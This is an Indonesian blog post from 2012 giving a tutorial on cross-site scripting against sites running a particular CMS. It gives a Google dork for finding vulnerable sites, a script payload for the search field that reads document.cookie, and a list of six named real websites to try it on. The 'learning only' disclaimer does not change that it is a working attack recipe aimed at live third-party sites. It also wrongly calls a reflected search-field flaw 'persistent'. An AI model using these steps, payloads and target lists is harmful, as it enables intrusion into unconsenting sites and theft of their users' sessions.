Rabu, 25 April 2012

Home » » CMS XSS Presistent Vulnerability(Tutorial)

CMS XSS Presistent Vulnerability(Tutorial)

pagi semua ^^..

Kali ini saya mau share cara simpel XSS Presistent Vuln di CMS.
Caranya simpel kok, cukup disimak aja gan ^^...

Alat :

-Browser Masing2..
-Mbah Google..

HOW TO :

1. Buka Google, Lalu Cari web yang Vuln. dengan Dork :

intext:"Powered by MyWorldCMS"

2. Cari Website yang benar-benar vuln. akan XSS (website berbasis CMS)

3. Lalu Masukan Script XSS dibawah ini pada Form / Kotak Pencarian untuk mengecek apa Web tersebut Vulneraility atau tidak :
 
search.php?keyword="><script>alert(document.cookie)</script>&Submit=Search!
 
Seperti contoh saya :
 
 4. Setelah script XSS dimasukin, ntar muncul Notifikasi seperti ini :
 


Beberapa Contoh web CMS yang bisa Dipake untuk pembelajaran / Tutorial XSS :
http://www.revitalizereseda.org
http://www.anelder.org
http://www.ucanhelp.org
http://www.umaweb.org
http://www.tusharwater.com
http://www.bartlettarboretum.org
 
NOTE : hanya untuk pembelajaran / Tutorial, jangan disalah gunakan ^^

Thanks To :
Angel Injection (For Script + TuT)
 
Sumber : http://1337day.com/exploits/18130

Judul: CMS XSS Presistent Vulnerability(Tutorial)
Rating: 100% based on 84843 ratings. 5 user reviews.
Ditulis Oleh Sabo Tase™

Terima Kasih Anda sudah membaca artikel "CMS XSS Presistent Vulnerability(Tutorial)" yang di terbitkan pada hari Rabu, 25 April 2012 jam 19.59 dan diulas oleh Sabo Tase™. Anda berhak menyebarluaskan artikel CMS XSS Presistent Vulnerability(Tutorial) ini, tetapi mohon sertakan link sumber dari blog ini. Semoga saja dengan adanya artikel tentang CMS XSS Presistent Vulnerability(Tutorial) yang ada di Blog Bisnis Online JoMeluMelu ini bisa berguna bagi Anda khususnya Saya pribadi.

Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)